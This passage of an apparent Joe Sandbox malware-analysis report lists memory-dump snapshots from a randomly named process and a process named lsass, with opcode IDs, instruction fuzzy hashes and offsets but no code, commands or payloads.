                                                            • Opcode ID: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction ID: c72533d5cb17247a87bb1c533d6d5b87f0d4f81b654bc3262004b07077e8c00b
                                                            • Opcode Fuzzy Hash: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction Fuzzy Hash: C3312020F0A91A4FEFD4EB2484A57B862D2FF5B700F5400B5D60ED7292DEACAC40A711
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 577906e6478e79d6bf01e7caf8466d7481c954916c04ff6c0bb73580eeab3964
                                                            • Instruction ID: 9a14ac7cdb279f6ee481df7b3a8c653c5a1a14bc7c6fcf4faeffedb40c2ab924
                                                            • Opcode Fuzzy Hash: 577906e6478e79d6bf01e7caf8466d7481c954916c04ff6c0bb73580eeab3964
                                                            • Instruction Fuzzy Hash: A631A231A0D64A8FDB85EB68C8A5AA977F0FF5A300B0545BAC009D7193DE79A841CB50
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9691d792c55b3d3d1974f5761b2af6fb345ff1557b5734232521eafe63c6a12
                                                            • Instruction ID: 19ee39c4927208949236e2a1ad61f824bbc44f729b4a6a02e9af9f241984a610
                                                            • Opcode Fuzzy Hash: c9691d792c55b3d3d1974f5761b2af6fb345ff1557b5734232521eafe63c6a12
                                                            • Instruction Fuzzy Hash: 3A212C20B199590FEBD8F76C54BA6B976C6DB9A311F1040BDE50DC33D3DD68AC418250
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction ID: fdab3cff6af208bbab6acc08e01a21042412c9e62ed33bb1b25778f1a9e79b67
                                                            • Opcode Fuzzy Hash: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction Fuzzy Hash: 75212936F0E6599FE712ABB898A10EC7B60EF43321F0441B3D248CB083E97C65469791
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce73290fcf8ca2d652c4a4cd191fa3368224d49c3f0918891fd525af61528998
                                                            • Instruction ID: fe48fa3b33e22a50218875c0e7f352a777f44233c37384ad97f087fb915abc8b
                                                            • Opcode Fuzzy Hash: ce73290fcf8ca2d652c4a4cd191fa3368224d49c3f0918891fd525af61528998
                                                            • Instruction Fuzzy Hash: 96115B22E0F6894FDB25A76548AA5E97FA0FF57320F4802BBE50CC7093D92D68458382
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc92596cf6df3908c40b78712adb02d01e50996e851e9827f9a2892421717afc
                                                            • Instruction ID: 57acc09791f387729c389f12d5e537027a77c22b2cb0359827437f8bd9008bf4
                                                            • Opcode Fuzzy Hash: fc92596cf6df3908c40b78712adb02d01e50996e851e9827f9a2892421717afc
                                                            • Instruction Fuzzy Hash: 3311C032F1A9268FEB68EB58C4A16B833A1FB56310F044279D40DD72C2CE2C78429B81
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 376016077bcdb972c868341ce2bcb91fd06293f52c51ff7fa00193cc212ce6bb
                                                            • Instruction ID: 6cb2495ec28453283bcecfdbee86fb4bfcc9f02b5fa26587972213747fea5c7e
                                                            • Opcode Fuzzy Hash: 376016077bcdb972c868341ce2bcb91fd06293f52c51ff7fa00193cc212ce6bb
                                                            • Instruction Fuzzy Hash: C1114F35A09A09CFEBD4EB04C494BAD77F2EB69311F15416AD00EE72A0CB79A9C1DF44
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9eb178c4f6badb0614f9604599b8b76714e9d6950d87abe70f2f50f59437142
                                                            • Instruction ID: d7e20ef46caded103447866c82c7d0a7a415cef8aa2d7700b4657cfbc0ef01d9
                                                            • Opcode Fuzzy Hash: f9eb178c4f6badb0614f9604599b8b76714e9d6950d87abe70f2f50f59437142
                                                            • Instruction Fuzzy Hash: F0110231F0E6899FE742DFA888A11EC7BB0EF43310F0440B2C244DB182E97C660A97A0
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35ebce3d15490930016013e936b75ba7b1a9d08090cbd0839bb9e25f21e05828
                                                            • Instruction ID: 3c6f25c25252c45da23a75aba0579235deb93d5d0d959b0794446366e4bf13fb
                                                            • Opcode Fuzzy Hash: 35ebce3d15490930016013e936b75ba7b1a9d08090cbd0839bb9e25f21e05828
                                                            • Instruction Fuzzy Hash: 59110431F0E6899FE742DF6888A01DD7BB0EF43310F0440B6C144DB182D97C660A9790
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2f1a55ce095e69b2ecfad5ea60fc5538624c27008e4287a8a2fa32600e1fc0c
                                                            • Instruction ID: 96db63ef88410a96e8150ddf982fe74f514410a2731183c1e40f2e511171b046
                                                            • Opcode Fuzzy Hash: d2f1a55ce095e69b2ecfad5ea60fc5538624c27008e4287a8a2fa32600e1fc0c
                                                            • Instruction Fuzzy Hash: A0018872F0A5198AEB58D71498A03F937E2EFD7308F18C135D109DA189CE3E69829740
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: feff8a622c2c9acc54c52f77033101e73e198fc650f9c086de1b1a29d46fbf84
                                                            • Instruction ID: 3d479ace959c3510bd325deb31f905d4d0e3b3a52c4ddb87f263459dc55489e5
                                                            • Opcode Fuzzy Hash: feff8a622c2c9acc54c52f77033101e73e198fc650f9c086de1b1a29d46fbf84
                                                            • Instruction Fuzzy Hash: 08018F34E0E3899FEB52DFA888A01AD7FB0EF13310F1441F6D144DB182EA7C6A459791
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348b0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bcd89a8f8768fe654cdb917249cd89db6916c6b1746d51ce88bbf4bfac958eac
                                                            • Instruction ID: 5e17336931aa322577ed38d81786eb2075760f6ae13e6c75b0c605cb28765cd4
                                                            • Opcode Fuzzy Hash: bcd89a8f8768fe654cdb917249cd89db6916c6b1746d51ce88bbf4bfac958eac
                                                            • Instruction Fuzzy Hash: 12F0BE30F0CA1B4FF655AB0C98E16B93290EF46B10F4086B0D61ED31D6EEBCE80162D8
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: 35ae8fa9d6c8ca725658f27ceb8a00f2924cf5f348593faf5c6130b85e78c64a
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 1AF0EC30A1A61E8EFF95EF40C8E47F87361FB96701F5401B5C60AD72A1DFAC69809A50
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348b0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc6928601ac4023642bb877c0a16b052cc58f661261eb5963f0e5f1016135284
                                                            • Instruction ID: 62fe683fe02f3d704edac8c18cc997af98f19122319f652ed94f22893697e70d
                                                            • Opcode Fuzzy Hash: fc6928601ac4023642bb877c0a16b052cc58f661261eb5963f0e5f1016135284
                                                            • Instruction Fuzzy Hash: 96F03C71E0850A8FF724EB84C8A6ABE77B1EF55710F10063AC529D7299CFBC654597C0
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348d1000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 698a0d64a404d475358452e4164a353129a079838839701b8150873d536ecf3c
                                                            • Instruction ID: cd1319ce680a254d83218c3a19457cc3c631bbce22b53fa1d4fe2c5fbd3ae0e5
                                                            • Opcode Fuzzy Hash: 698a0d64a404d475358452e4164a353129a079838839701b8150873d536ecf3c
                                                            • Instruction Fuzzy Hash: FAF0E5217497C40FC719963944A90617FF1CB5B10234902EFC496C76A3DD58EC868341
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348c3000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 110a6bd162a9b23d82c6fe87f04ff1148e051c326aa1b2e9c273ec8e5de1ee4a
                                                            • Instruction ID: e9ba053ee64d10ac7e9d4955239efbef1eeba77394ca752d6f735fce1581891b
                                                            • Opcode Fuzzy Hash: 110a6bd162a9b23d82c6fe87f04ff1148e051c326aa1b2e9c273ec8e5de1ee4a
                                                            • Instruction Fuzzy Hash: B3F0306551E7C41FD3129B388D664547FF0EA1721534B45EBC0CACB4B3D50D8846C312
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.3125658121.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd348a0000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: B4628421F1891A4FEB98EB5884E17B8B3E1FF95310F1441BAD14DD72D6DE38AC429B81
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a722501793d7e4247ef57480532a0ceb824336db65a05dfbce47b9bce5161388
                                                            • Instruction ID: 666120b5a734683f93ebf844c51ca696842e9d6a9b19413691d223a25e81abb1
                                                            • Opcode Fuzzy Hash: a722501793d7e4247ef57480532a0ceb824336db65a05dfbce47b9bce5161388
                                                            • Instruction Fuzzy Hash: B2628421F1891A4FEB98EB5884E17B8B3E1FF95310F1441BAD14DD72D6DE38AC429B81
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: af65cf519be62a5f5063365fb3b845053435e96b7ed103e203f88bb9e6b2a58d
                                                            • Instruction ID: 5ff5c09fd4d3bf15a5fd5804028de5fe456cf3abaf3d8bec375096a33475f33d
                                                            • Opcode Fuzzy Hash: af65cf519be62a5f5063365fb3b845053435e96b7ed103e203f88bb9e6b2a58d
                                                            • Instruction Fuzzy Hash: 77628421F1891A4FEB98EB5884E17B8B3D1FF95310F1441BAD14DD72D6DE38AC419B81
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d135137a5d60c4484679fb1e648cf4e78f647f45e1674dfbdd7dfaadda4e2d5f
                                                            • Instruction ID: 9e7c990d68688f28b910f300e8f7797939eb0c7b7febf3f4b6ac0fe329c60562
                                                            • Opcode Fuzzy Hash: d135137a5d60c4484679fb1e648cf4e78f647f45e1674dfbdd7dfaadda4e2d5f
                                                            • Instruction Fuzzy Hash: 14628421F1891A4FEB98EB5884E17B8B3E1FF95310F1441BAD14DD72D6DE38AC429B81
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc3ff3722badeb49b73b37a51b73a3a9cd488ace656a983b1729ddfa83c92cc1
                                                            • Instruction ID: 2536bca4a501102daa55777f83d9d08765ebe008f9e2fdc50f49174eebdf5a28
                                                            • Opcode Fuzzy Hash: fc3ff3722badeb49b73b37a51b73a3a9cd488ace656a983b1729ddfa83c92cc1
                                                            • Instruction Fuzzy Hash: E1B15B21A6C65A06E31D961C48E20B6B3D2EB93706B2C537DCEE7C748BDD1C685396C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAz4
                                                            • API String ID: 0-4208471536
                                                            • Opcode ID: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction ID: 7470b4312726b0e37fc381a5c3c137eee02d1f7244ea50c529dd3a121b239b27
                                                            • Opcode Fuzzy Hash: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction Fuzzy Hash: D7313421A0E7890FE7569B3888B51A93BB0EF87200F0941F7D549C71E3DD2C69068791
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H
                                                            • API String ID: 0-2852464175
                                                            • Opcode ID: 997eb4eadc75ca4402e84a6117cc64fe3378499df29ed88657d8c185ecda5de2
                                                            • Instruction ID: 0277d7de51f117381d57f63ad06405c83fd80419f5de7333bd5f83b1fce95abb
                                                            • Opcode Fuzzy Hash: 997eb4eadc75ca4402e84a6117cc64fe3378499df29ed88657d8c185ecda5de2
                                                            • Instruction Fuzzy Hash: 78015E71F0851A8BEB58D75498A43FE37E2EFD6304F188034D509D7185DE3E6AC6A740
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 715c48e77f8c6ebee8fc61a1de9f4722bb0a82c83da788da50ed4e075ba74d23
                                                            • Instruction ID: 29fa786b810987046f0d547e4a729bc9dcfa107cede82721b2caedfa0f3a6d73
                                                            • Opcode Fuzzy Hash: 715c48e77f8c6ebee8fc61a1de9f4722bb0a82c83da788da50ed4e075ba74d23
                                                            • Instruction Fuzzy Hash: 0BF0A061A0F7854FCB669A3488694587FA0EF67200B8A42EEC046CF5A3EE2C8846C701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 22578f3fa9713471383a29442e5ffbf4fc2a5721f6783a8fa0670da67c573d9c
                                                            • Instruction ID: b36cfade61e7417599e45e2cb2920733ffef69a94b617dc15dfc5941e8329226
                                                            • Opcode Fuzzy Hash: 22578f3fa9713471383a29442e5ffbf4fc2a5721f6783a8fa0670da67c573d9c
                                                            • Instruction Fuzzy Hash: 8AE01A7164F7C08FCB06EB7488798447FA0AE6721078B41EEC146CF1B3E62D8849C701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 6d6a752976c10b68381c7e48794814221d410325e36f782a6cc19096da1fce99
                                                            • Instruction ID: 01646989f3206e1461498404045fba049be280d30bc556787299b28557f5f4c0
                                                            • Opcode Fuzzy Hash: 6d6a752976c10b68381c7e48794814221d410325e36f782a6cc19096da1fce99
                                                            • Instruction Fuzzy Hash: DBE0E56154E7D44FCB0AAB3488698457FA0AE6B21178A40EEC149CB1A3E66D8849C701
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5df4cf8b21d7fc3c6b9cee562d0e4c229f2f3121b8a084059e5a760c46a526f
                                                            • Instruction ID: bd6e0654f7cb8bd952af39f22d5ae811da4aec03ee51cdb5040f0ccc134214ab
                                                            • Opcode Fuzzy Hash: f5df4cf8b21d7fc3c6b9cee562d0e4c229f2f3121b8a084059e5a760c46a526f
                                                            • Instruction Fuzzy Hash: 9181D371B1E90A4FDB94EB68C4A56A977E1FF59310F50027AD10ED7292DF38A842DB80
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2e79bb2a193e63176991c97fb0b38664798006ea1e1daa5b7c6c4896b78eb98
                                                            • Instruction ID: 3bef1213ebd980830f904282587f96f37306fd00a1aadbba36b6a8ea565943fa
                                                            • Opcode Fuzzy Hash: c2e79bb2a193e63176991c97fb0b38664798006ea1e1daa5b7c6c4896b78eb98
                                                            • Instruction Fuzzy Hash: A1619570608A4D8FEB58EF18C8967F93BE1FF59311F00416AE85DC7692DE78E8458B81
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ba3770b3ad667710a62f3f1bf424e12dc69f50a569cf200ec5a07c403691a8c
                                                            • Instruction ID: 418b14535111ccb18a8b0c2f6d6f608738822c97a16e8ea48878da5d1e257e1e
                                                            • Opcode Fuzzy Hash: 0ba3770b3ad667710a62f3f1bf424e12dc69f50a569cf200ec5a07c403691a8c
                                                            • Instruction Fuzzy Hash: 0341F222B0C5691FE714B7FCA4BA2FE7791DF86321B0805BBD54DC7193DD68A84182C4
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d828453ab47baafff7688b4ef675afc743a414bfc7234ecc68b8c7477fd06068
                                                            • Instruction ID: 2eade0ce2d692b7371f73eb29d7af6a68968d86c698b062770f9a61c43838428
                                                            • Opcode Fuzzy Hash: d828453ab47baafff7688b4ef675afc743a414bfc7234ecc68b8c7477fd06068
                                                            • Instruction Fuzzy Hash: 1B41C561F0D90A4FEB98DB5C94F56F973D1EF95750F0801BAD50DD7282CE2CA8869780
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e91aeb41a854c0e391bf286268ac55d6c60086822bc58c50e8aac7f1d02f3444
                                                            • Instruction ID: 9c35c5eb4354ffee8bfa4451814cbd1f6db82d97448c067d4931b07d4741d71d
                                                            • Opcode Fuzzy Hash: e91aeb41a854c0e391bf286268ac55d6c60086822bc58c50e8aac7f1d02f3444
                                                            • Instruction Fuzzy Hash: A9412422B0C5291FE714B7FCA4BA2F97791DF86321B08047BE14DC7193DDA8B84182C4
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: e9a9dbf1134489ff64ed3cba917a8358e1fcd4671c08e58730990ba5daa9f485
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 7321913130C9184FE768EA1CE88ADB977D1EF9A32171501BAE58AC7126E955EC8287C1
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction ID: 7576e503df4d863be61114b351e301bd5f2f669ca10a6d89107f0f71a574b2be
                                                            • Opcode Fuzzy Hash: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction Fuzzy Hash: 4E310120F0C91A4FEB94EB2884B67B86291FF5B740F5041B5D64ED7296DEACAC40A781
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c49838792bc16148744faf695a7655e46f601b4a0c4d1fc2cebe48be8f885e6e
                                                            • Instruction ID: 43aa586c3f3487e6c281875c79296e318127b077827b44a1b00d64a07509404a
                                                            • Opcode Fuzzy Hash: c49838792bc16148744faf695a7655e46f601b4a0c4d1fc2cebe48be8f885e6e
                                                            • Instruction Fuzzy Hash: 6031B631A0C54A8FDB45EB64C8A59BD77F0FF5A300F0545BAC00ADB293DE79A941CB80
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6052687e74018d3a7d4bfc0e942a55cb10d526571d95bcc371a613186694db4b
                                                            • Instruction ID: be5ca8baaed752b3fc4a17927c324f57be1e7183b4e9ef6988fa112c0ffc9963
                                                            • Opcode Fuzzy Hash: 6052687e74018d3a7d4bfc0e942a55cb10d526571d95bcc371a613186694db4b
